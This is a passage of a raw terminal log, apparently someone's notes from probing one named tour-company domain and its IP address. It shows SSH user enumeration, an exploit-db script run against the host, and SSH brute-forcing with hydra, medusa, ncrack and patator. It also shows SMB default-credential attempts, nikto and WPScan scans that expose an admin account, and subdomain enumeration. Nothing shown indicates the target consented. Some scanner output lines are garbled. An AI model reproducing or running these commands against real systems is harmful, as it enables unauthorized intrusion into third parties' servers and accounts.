  3007. root@blackbox:~# locate users | grep users.txt
  3008. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3009.  
  3010. msf5 > use auxiliary/scanner/ssh/ssh_enumusers
  3011. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
  3012. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 84.154.192.250
  3013. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3014. USER_FILE => /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3015. msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
  3016.  
  3017. SSH - User 'root' found
  3018.  
  3019. https://www.exploit-db.com/exploits/45210
  3020.  
  3021. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 admin
  3022. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 root
  3023.  
  3024.  
  3025. SSH BRUTE
  3026.  
  3027. use auxiliary/scanner/ssh/ssh_login
  3028. msf exploit (ssh_login)>set rhosts 184.154.192.250
  3029. msf exploit (ssh_login)>set user_file /root/Desktop/user.txt
  3030. msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt
  3031. msf exploit (ssh_login)>exploit
  3032.  
  3033.  
  3034. hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /opt/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://184.154.192.250 -t 4
  3035.  
  3036. patator ssh_login host=184.154.192.250 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
  3037.  
  3038. ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 184.154.192.250:22
  3039.  
  3040. medusa -h 184.154.192.250 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
  3041.  
  3042.  
  3043. usernames list
  3044. /opt/SecLists/Usernames/top-usernames-shortlist.txt
  3045.  
  3046. passwords list
  3047. /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
  3048.  
  3049. passwords list combo
  3050. /opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
  3051.  
  3052. root@blackbox:~# ssh_scan -t 184.154.192.250
  3053.  
  3054.  
  3055. SSH SCAN
  3056.  
  3057. root@blackbox:/opt/smbmap# ssh_scan -t 184.154.192.250
  3058. [
  3059. {
  3060. "ssh_scan_version": "0.0.42",
  3061. "ip": "184.154.192.250",
  3062. "hostname": "server.etours.cn",
  3063. "port": 22,
  3064. "server_banner": "SSH-2.0-OpenSSH_4.3",
  3065. "ssh_version": 2.0,
  3066. "os": "unknown",
  3067. "os_cpe": "o:unknown",
  3068. "ssh_lib": "openssh",
  3069. "ssh_lib_cpe": "a:openssh:openssh:4.3",
  3070. "key_algorithms": [
  3071. "diffie-hellman-group-exchange-sha1",
  3072. "diffie-hellman-group14-sha1",
  3073. "diffie-hellman-group1-sha1"
  3074. ],
  3075. "encryption_algorithms_client_to_server": [
  3076. "aes128-ctr",
  3077. "aes192-ctr",
  3078. "aes256-ctr",
  3079. "arcfour256",
  3080. "arcfour128",
  3081. "aes128-cbc",
  3082. "3des-cbc",
  3083. "blowfish-cbc",
  3084. "cast128-cbc",
  3085. "aes192-cbc",
  3086. "aes256-cbc",
  3087. "arcfour",
  3088. ],
  3089. "encryption_algorithms_server_to_client": [
  3090. "aes128-ctr",
  3091. "aes192-ctr",
  3092. "aes256-ctr",
  3093. "arcfour256",
  3094. "arcfour128",
  3095. "aes128-cbc",
  3096. "3des-cbc",
  3097. "blowfish-cbc",
  3098. "cast128-cbc",
  3099. "aes192-cbc",
  3100. "aes256-cbc",
  3101. "arcfour",
  3102. ],
  3103. "mac_algorithms_client_to_server": [
  3104. "hmac-md5",
  3105. "hmac-sha1",
  3106. "hmac-ripemd160",
  3107. "hmac-sha1-96",
  3108. "hmac-md5-96"
  3109. ],
  3110. "mac_algorithms_server_to_client": [
  3111. "hmac-md5",
  3112. "hmac-sha1",
  3113. "hmac-ripemd160",
  3114. "hmac-sha1-96",
  3115. "hmac-md5-96"
  3116. ],
  3117. "compression_algorithms_client_to_server": [
  3118. "none",
  3119. ],
  3120. "compression_algorithms_server_to_client": [
  3121. "none",
  3122. ],
  3123. "languages_client_to_server": [
  3124.  
  3125. ],
  3126. "languages_server_to_client": [
  3127.  
  3128. ],
  3129. "auth_methods": [
  3130. "publickey",
  3131. "gssapi-with-mic",
  3132. "password"
  3133. ],
  3134. "keys": {
  3135. "rsa": {
  3136. "raw": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7KnYh43OYzJfoqtaHDqyUUbN3AkmyU4UhmHokahcHmg5okzEqkYX6IzLepxU1UgFFCaOMozBF/fU0iibocOidKZZST/13CvcRtaHXCwtZEFii+9NopBk08q7tCu0N6lv1IZKHWvBdIKalwzHpnwYntpvmPR3Y7tfHtxWpF/lh7TGCzdah1aeuET1P8hp7dGjkt6f07pbf/j/8CjMDp4DLVxRCdSL9DlZuqMYi0qZMk9g99YCorkQDUO20lHL89zzUXiDBEpEKVsrf9JFMb4/MRLaDQ8sVoBqPQRuFYFQaNgWkHs88OrtdV3MpMhaRxLcGcHtkzeAlc5OTAodzWgwxw==",
  3137. "length": 2048,
  3138. "fingerprints": {
  3139. "md5": "48:4f:ba:b1:e8:ae:12:ee:2b:e9:38:87:93:38:5c:4d",
  3140. "sha1": "0d:13:d6:24:42:42:85:97:36:3c:b4:57:c9:83:57:0c:12:73:4f:a2",
  3141. "sha256": "a8:0b:2f:13:a4:dd:f2:00:4f:ad:65:e7:18:70:d5:66:60:eb:34:0b:69:f0:b4:d6:b7:0a:03:01:37:56:f5:d9"
  3142. }
  3143. }
  3144. },
  3145. "dns_keys": [
  3146.  
  3147. ],
  3148. "duplicate_host_key_ips": [
  3149.  
  3150. ],
  3151. "compliance": {
  3152. "policy": "Mozilla Modern",
  3153. "compliant": false,
  3154. "recommendations": [
  3155. "Add these key exchange algorithms: [email protected],ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256",
  3156. "Add these MAC algorithms: [email protected],[email protected],[email protected],hmac-sha2-512,hmac-sha2-256,[email protected]",
  3157. "Add these encryption ciphers: [email protected],[email protected],[email protected]",
  3158. "Remove these key exchange algorithms: diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1",
  3159. "Remove these MAC algorithms: hmac-md5, hmac-sha1, hmac-ripemd160, [email protected], hmac-sha1-96, hmac-md5-96",
  3160. "Remove these encryption ciphers: arcfour256, arcfour128, aes128-cbc, 3des-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour, [email protected]",
  3161. "Remove these authentication methods: gssapi-with-mic, password"
  3162. ],
  3163. "references": [
  3164. "https://wiki.mozilla.org/Security/Guidelines/OpenSSH"
  3165. ],
  3166. "grade": "F"
  3167. },
  3168. "start_time": "2020-01-22 15:10:54 -0600",
  3169. "end_time": "2020-01-22 15:10:57 -0600",
  3170. "scan_duration_seconds": 3.036491516
  3171. }
  3172. ]
  3173.  
  3174.  
  3175. SMB CHECK
  3176.  
  3177.  
  3178. root@blackbox:/opt# git clone https://github.com/ShawnDEvans/smbmap.git
  3179. root@blackbox:/opt# cd smbmap/
  3180. root@blackbox:/opt/smbmap# python3 -m pip install -r requirements.txt
  3181.  
  3182. root@blackbox:/opt/smbmap# python3 smbmap.py -u admin -p admin -d workgroup -H 184.154.192.250
  3183.  
  3184. root@blackbox:/opt/smbmap# python3 smbmap.py -u guest -p "" -H 184.154.192.250
  3185.  
  3186. Using null session
  3187.  
  3188. root@blackbox:/opt/smbmap# python3 smbmap.py -H 184.154.192.250 -r
  3189.  
  3190. Guest Session with port specified for Samba
  3191.  
  3192. root@blackbox:/opt/smbmap# python3 smbmap.py -u "" -p "" -H 184.154.192.250 -P 139
  3193.  
  3194. root@blackbox:/opt/smbmap# python3 smbmap.py -u administrator -p administrator -H 184.154.192.250
  3195.  
  3196.  
  3197. root@blackbox:/opt/smbmap# nmap --script smb-vuln* -p 137,139,443,80,22,21 184.154.192.250 --open
  3198. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 15:08 CST
  3199. Nmap scan report for server.etours.cn (184.154.192.250)
  3200. Host is up (0.081s latency).
  3201. Not shown: 2 closed ports
  3202. PORT STATE SERVICE
  3203. 21/tcp open ftp
  3204. 22/tcp open ssh
  3205. 80/tcp open http
  3206. 443/tcp open https
  3207.  
  3208. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
  3209.  
  3210. NIKTO CHECK
  3211.  
  3212. root@blackbox:/opt# nikto -h etours.cn -C all
  3213. - Nikto v2.1.6
  3214. ---------------------------------------------------------------------------
  3215. + Target IP: 184.154.192.250
  3216. + Target Hostname: etours.cn
  3217. + Target Port: 80
  3218. + Start Time: 2020-01-23 03:57:53 (GMT-6)
  3219. ---------------------------------------------------------------------------
  3220. + Server: Apache
  3221. + The anti-clickjacking X-Frame-Options header is not present.
  3222. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3223. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3224. + Root page / redirects to: http://www.etours.cn/
  3225. + Retrieved x-powered-by header: PleskLin
  3226. + Server may leak inodes via ETags, header found with file /6BsxYMU7.pl, inode: 20758719, size: 954, mtime: Wed Sep 14 18:10:28 2011
  3227. + Uncommon header 'link' found, with contents: <http://www.etours.cn/blog/wp-json/>; rel="https://api.w.org/"
  3228. + OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
  3229. + OSVDB-3268: /icons/: Directory indexing found.
  3230. + OSVDB-3233: /icons/README: Apache default file found.
  3231. + 26400 requests: 0 error(s) and 9 item(s) reported on remote host
  3232. + End Time: 2020-01-23 06:12:41 (GMT-6) (8088 seconds)
  3233. ---------------------------------------------------------------------------
  3234. + 1 host(s) tested
  3235.  
  3236.  
  3237.  
  3238. http://www.etours.cn/blog/wp-json/
  3239.  
  3240. root@blackbox:/opt# git clone https://github.com/wpscanteam/wpscan.git
  3241. root@blackbox:/opt# cd wpscan
  3242. root@blackbox:/opt/wpscan# gem install wpscan
  3243.  
  3244.  
  3245. root@blackbox:/opt/wpscan# nano ~/.wpscan/scan.yml
  3246.  
  3247. cli_options:
  3248. api_token:
  3249.  
  3250. root@blackbox:/opt/wpscan# wpscan --url http://www.etours.cn/blog/ --enumerate u1-100
  3251. _______________________________________________________________
  3252. __ _______ _____
  3253. \ \ / / __ \ / ____|
  3254. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  3255. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  3256. \ /\ / | | ____) | (__| (_| | | | |
  3257. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  3258.  
  3259. WordPress Security Scanner by the WPScan Team
  3260. Version 3.7.7
  3261. Sponsored by Automattic - https://automattic.com/
  3262. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  3263. _______________________________________________________________
  3264.  
  3265. [+] URL: http://www.etours.cn/blog/
  3266. [+] Started: Wed Jan 22 16:15:53 2020
  3267.  
  3268. Interesting Finding(s):
  3269.  
  3270. [+] http://www.etours.cn/blog/
  3271. | Interesting Entries:
  3272. | - Server: Apache
  3273. | - X-Powered-By: PleskLin
  3274. | Found By: Headers (Passive Detection)
  3275. | Confidence: 100%
  3276.  
  3277. [+] http://www.etours.cn/blog/xmlrpc.php
  3278. | Found By: Link Tag (Passive Detection)
  3279. | Confidence: 100%
  3280. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
  3281. | References:
  3282. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3283. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3284. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3285. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3286. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3287.  
  3288. [+] http://www.etours.cn/blog/readme.html
  3289. | Found By: Direct Access (Aggressive Detection)
  3290. | Confidence: 100%
  3291.  
  3292. [+] http://www.etours.cn/blog/wp-cron.php
  3293. | Found By: Direct Access (Aggressive Detection)
  3294. | Confidence: 60%
  3295. | References:
  3296. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3297. | - https://github.com/wpscanteam/wpscan/issues/1299
  3298.  
  3299. [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
  3300. | Found By: Rss Generator (Passive Detection)
  3301. | - http://www.etours.cn/blog/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3302. | - http://www.etours.cn/blog/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3303. |
  3304. | [!] 12 vulnerabilities identified:
  3305. |
  3306. | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
  3307. | Fixed in: 5.1.2
  3308. | References:
  3309. | - https://wpvulndb.com/vulnerabilities/9867
  3310. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
  3311. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3312. | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
  3313. | - https://hackerone.com/reports/339483
  3314. |
  3315. | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
  3316. | Fixed in: 5.1.2
  3317. | References:
  3318. | - https://wpvulndb.com/vulnerabilities/9864
  3319. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
  3320. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3321. | - https://fortiguard.com/zeroday/FG-VD-18-165
  3322. | - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
  3323. |
  3324. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
  3325. | Fixed in: 5.1.3
  3326. | References:
  3327. | - https://wpvulndb.com/vulnerabilities/9908
  3328. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
  3329. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3330. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3331. |
  3332. | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
  3333. | Fixed in: 5.1.3
  3334. | References:
  3335. | - https://wpvulndb.com/vulnerabilities/9909
  3336. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
  3337. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3338. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3339. | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
  3340. | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
  3341. |
  3342. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
  3343. | Fixed in: 5.1.3
  3344. | References:
  3345. | - https://wpvulndb.com/vulnerabilities/9910
  3346. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
  3347. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3348. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3349. |
  3350. | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
  3351. | Fixed in: 5.1.3
  3352. | References:
  3353. | - https://wpvulndb.com/vulnerabilities/9911
  3354. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
  3355. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3356. | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
  3357. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3358. |
  3359. | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
  3360. | Fixed in: 5.1.3
  3361. | References:
  3362. | - https://wpvulndb.com/vulnerabilities/9912
  3363. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
  3364. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
  3365. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3366. | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
  3367. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3368. |
  3369. | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
  3370. | Fixed in: 5.1.3
  3371. | References:
  3372. | - https://wpvulndb.com/vulnerabilities/9913
  3373. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
  3374. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3375. | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
  3376. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3377. |
  3378. | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
  3379. | Fixed in: 5.1.4
  3380. | References:
  3381. | - https://wpvulndb.com/vulnerabilities/9973
  3382. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
  3383. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
  3384. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3385. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
  3386. |
  3387. | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
  3388. | Fixed in: 5.1.4
  3389. | References:
  3390. | - https://wpvulndb.com/vulnerabilities/9975
  3391. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
  3392. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3393. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3394. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3395. | - https://hackerone.com/reports/509930
  3396. | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
  3397. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
  3398. |
  3399. | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
  3400. | Fixed in: 5.1.4
  3401. | References:
  3402. | - https://wpvulndb.com/vulnerabilities/9976
  3403. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
  3404. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
  3405. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3406. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
  3407. |
  3408. | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
  3409. | Fixed in: 5.1.4
  3410. | References:
  3411. | - https://wpvulndb.com/vulnerabilities/10004
  3412. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
  3413. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3414. | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
  3415.  
  3416. [+] WordPress theme in use: twentyeleven
  3417. | Location: http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3418. | Last Updated: 2019-05-07T00:00:00.000Z
  3419. | Readme: http://www.etours.cn/blog/wp-content/themes/twentyeleven/readme.txt
  3420. | [!] The version is out of date, the latest version is 3.3
  3421. | Style URL: http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css
  3422. | Style Name: Twenty Eleven
  3423. | Style URI: http://wordpress.org/extend/themes/twentyeleven
  3424. | Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a cust...
  3425. | Author: the WordPress team
  3426. | Author URI: http://wordpress.org/
  3427. |
  3428. | Found By: Css Style In Homepage (Passive Detection)
  3429. | Confirmed By: Css Style In 404 Page (Passive Detection)
  3430. |
  3431. | Version: 1.2 (80% confidence)
  3432. | Found By: Style (Passive Detection)
  3433. | - http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css, Match: 'Version: 1.2'
  3434.  
  3435. [+] Enumerating Users (via Passive and Aggressive Methods)
  3436. Brute Forcing Author IDs - Time: 00:00:18 <==============================================================================================================> (100 / 100) 100.00% Time: 00:00:18
  3437.  
  3438. [i] User(s) Identified:
  3439.  
  3440. [+] admin
  3441. | Found By: Author Posts - Author Pattern (Passive Detection)
  3442. | Confirmed By:
  3443. | Rss Generator (Passive Detection)
  3444. | Wp Json Api (Aggressive Detection)
  3445. | - http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3446. | Rss Generator (Aggressive Detection)
  3447. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  3448. | Login Error Messages (Aggressive Detection)
  3449.  
  3450. [+] WPVulnDB API OK
  3451. | Plan: free
  3452. | Requests Done (during the scan): 2
  3453. | Requests Remaining: 48
  3454.  
  3455. [+] Finished: Wed Jan 22 16:16:42 2020
  3456. [+] Requests Done: 140
  3457. [+] Cached Requests: 7
  3458. [+] Data Sent: 32.334 KB
  3459. [+] Data Received: 488.05 KB
  3460. [+] Memory used: 138.605 MB
  3461. [+] Elapsed time: 00:00:48
  3462.  
  3463.  
  3464. http://www.etours.cn/blog/phpinfo.php
  3465.  
  3466. Proudly powered by WordPress
  3467.  
  3468. http://www.etours.cn/blog/wp-login.php
  3469.  
  3470.  
  3471. http://www.etours.cn/blog/
  3472. http://www.etours.cn/blog/xmlrpc.php
  3473. http://www.etours.cn/blog/readme.html
  3474. http://www.etours.cn/blog/wp-cron.php
  3475. http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3476. http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3477.  
  3478.  
  3479.  
  3480. SUBDOMAIN SCAN USING KNOCK
  3481.  
  3482.  
  3483. root@blackbox:/# cd /opt/
  3484. root@blackbox:/opt# apt-get install python-dnspython
  3485. root@blackbox:/opt# git clone https://github.com/guelfoweb/knock.git
  3486. root@blackbox:/opt# cd knock
  3487. root@blackbox:/opt/knock# leafpad knockpy/config.json
  3488.  
  3489. INSERT YOUR VIRUS TOTAL API KEY
  3490.  
  3491. root@blackbox:/opt/knock# python setup.py install
  3492.  
  3493.  
  3494. root@blackbox:/opt/knock# knockpy etours.cn
  3495.  
  3496. _ __ _
  3497. | |/ / | | 4.1.1
  3498. | ' / _ __ ___ ___| | ___ __ _ _
  3499. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3500. | . \| | | | (_) | (__| <| |_) | |_| |
  3501. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3502. | | __/ |
  3503. |_| |___/
  3504.  
  3505. + checking for virustotal subdomains: YES
  3506. [
  3507. "www.etours.cn",
  3508. "mail.etours.cn",
  3509. "beijing.etours.cn"
  3510. ]
  3511. + checking for wildcard: NO
  3512. + checking for zonetransfer: NO
  3513. + resolving target: YES
  3514. - scanning for subdomain...
  3515.  
  3516. Ip Address Status Type Domain Name Server
  3517. ---------- ------ ---- ----------- ------
  3518. 184.154.192.250 200 host beijing.etours.cn Apache
  3519. 184.154.192.250 200 host dns.etours.cn Apache
  3520. 184.154.192.250 200 host ftp.etours.cn Apache
  3521. 184.154.192.250 200 host mail.etours.cn Apache
  3522. 184.154.192.250 302 host webmail.etours.cn Apache
  3523. 184.154.192.250 200 host www.etours.cn Apache
  3524.  
  3525.  
  3526. Check zone transfer for domain name
  3527.  
  3528. root@blackbox:/opt/knock# knockpy -r etours.cn
  3529.  
  3530. _ __ _
  3531. | |/ / | | 4.1.1
  3532. | ' / _ __ ___ ___| | ___ __ _ _
  3533. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3534. | . \| | | | (_) | (__| <| |_) | |_| |
  3535. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3536. | | __/ |
  3537. |_| |___/
  3538.  
  3539. + checking for virustotal subdomains: YES
  3540. [
  3541. "www.etours.cn",
  3542. "mail.etours.cn",
  3543. "beijing.etours.cn"
  3544. ]
  3545. + checking for wildcard: NO
  3546. + checking for zonetransfer: NO
  3547. + resolving target: YES
  3548. {
  3549. "zonetransfer": {
  3550. "enabled": false,
  3551. "list": []
  3552. },
  3553. "target": "etours.cn",
  3554. "hostname": "etours.cn",
  3555. "virustotal": [
  3556. "www.etours.cn",
  3557. "mail.etours.cn",
  3558. "beijing.etours.cn"
  3559. ],
  3560. "alias": [],
  3561. "wildcard": {
  3562. "detected": {},
  3563. "test_target": "flvckazhp.etours.cn",
  3564. "enabled": false,
  3565. "http_response": {}
  3566. },
  3567. "ipaddress": [
  3568. "184.154.192.250"
  3569. ],
  3570. "response_time": "0.484440803528",
  3571. "http_response": {
  3572. "status": {
  3573. "reason": "Moved Permanently",
  3574. "code": 301
  3575. },
  3576. "http_headers": {
  3577. "date": "Wed, 22 Jan 2020 21:40:37 GMT",
  3578. "connection": "close",
  3579. "content-type": "text/html; charset=iso-8859-1",
  3580. "location": "http://www.etours.cn/",
  3581. "server": "Apache"
  3582. }
  3583. }
  3584. }
  3585.  
  3586.  
  3587.  
  3588. root@blackbox:/opt/knock# knockpy 184.154.192.250
  3589.  
  3590. _ __ _
  3591. | |/ / | | 4.1.1
  3592. | ' / _ __ ___ ___| | ___ __ _ _
  3593. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3594. | . \| | | | (_) | (__| <| |_) | |_| |
  3595. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3596. | | __/ |
  3597. |_| |___/
  3598.  
  3599. + checking for virustotal subdomains: NO
  3600. + checking for wildcard: NO
  3601. + checking for zonetransfer: NO
  3602. + resolving target: YES
  3603. - scanning for subdomain...
  3604.  
  3605. Ip Address Status Type Domain Name Server
  3606. ---------- ------ ---- ----------- ------
  3607.  
  3608.  
  3609. knockpy etours.cn
  3610.  
  3611. subdomain scan with external wordlist
  3612.  
  3613. root@blackbox:/opt/knock# locate subdomains.txt
  3614. /opt/SecLists/Discovery/DNS/shubs-subdomains.txt
  3615.  
  3616.  
  3617. root@blackbox:/opt/knock# knockpy etours.cn -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3618.  
  3619. _ __ _
  3620. | |/ / | | 4.1.1
  3621. | ' / _ __ ___ ___| | ___ __ _ _
  3622. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3623. | . \| | | | (_) | (__| <| |_) | |_| |
  3624. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3625. | | __/ |
  3626. |_| |___/
  3627.  
  3628. + checking for virustotal subdomains: YES
  3629. [
  3630. "www.etours.cn",
  3631. "mail.etours.cn",
  3632. "beijing.etours.cn"
  3633. ]
  3634. + checking for wildcard: NO
  3635. + checking for zonetransfer: NO
  3636. + resolving target: YES
  3637. - scanning for subdomain...
  3638.  
  3639. Ip Address Status Type Domain Name Server
  3640. ---------- ------ ---- ----------- ------
  3641. 184.154.192.250 200 host mbeijing.etours.cneuatmistir Apache
  3642. 184.154.192.250 200 host edns.etours.cnarelluraggyp.7236.nApache
  3643. 184.154.192.250 200 host aftp.etours.cnpa.977992.n3s10 Apache
  3644. 184.154.192.250 200 host 8mail.etours.cnneegrangese-lack.vApache
  3645. 184.154.192.250 302 host uwebmail.etours.cn-proxy-iossent Apache
  3646. 184.154.192.250 200 host nwww.etours.cnenor.en Apache
  3647.  
  3648.  
  3649. http://184.154.192.250:8880/login_up.php3
  3650. https://184.154.192.250:8443/login_up.php3
  3651.  
  3652.  
  3653.  
  3654. root@blackbox:~# gobuster dir -u 184.154.192.250 -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt
  3655.  
  3656.  
  3657. root@blackbox:~# systemctl status postgresql.service
  3658.  
  3659. USE METASPLOIT
  3660.  
  3661.  
  3662. root@blackbox:~# cd /opt/metasploit-framework/
  3663.  
  3664. root@blackbox:/opt/metasploit-framework# su postgres
  3665. postgres@blackbox:/opt/metasploit-framework$ createuser msf_user -P
  3666. Enter password for new role: msf
  3667. Enter it again: msf
  3668. postgres@blackbox:/opt/metasploit-framework$ createdb --owner=msf_user msf_database
  3669. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3670.  
  3671. postgres@blackbox:/opt/metasploit-framework$ msfconsole
  3672.  
  3673. IIIIII dTb.dTb _.---._
  3674. II 4' v 'B .'"".'/|\`.""'.
  3675. II 6. .P : .' / | \ `. :
  3676. II 'T;. .;P' '.' / | \ `.'
  3677. II 'T; ;P' `. / | \ .'
  3678. IIIIII 'YvP' `-.__|__.-'
  3679.  
  3680. I love shells --egypt
  3681.  
  3682.  
  3683. =[ metasploit v5.0.72-dev- ]
  3684. + -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
  3685. + -- --=[ 562 payloads - 45 encoders - 10 nops ]
  3686. + -- --=[ 7 evasion ]
  3687.  
  3688.  
  3689. msf5 > db_status
  3690. [*] Connected to msf. Connection type: postgresql.
  3691.  
  3692.  
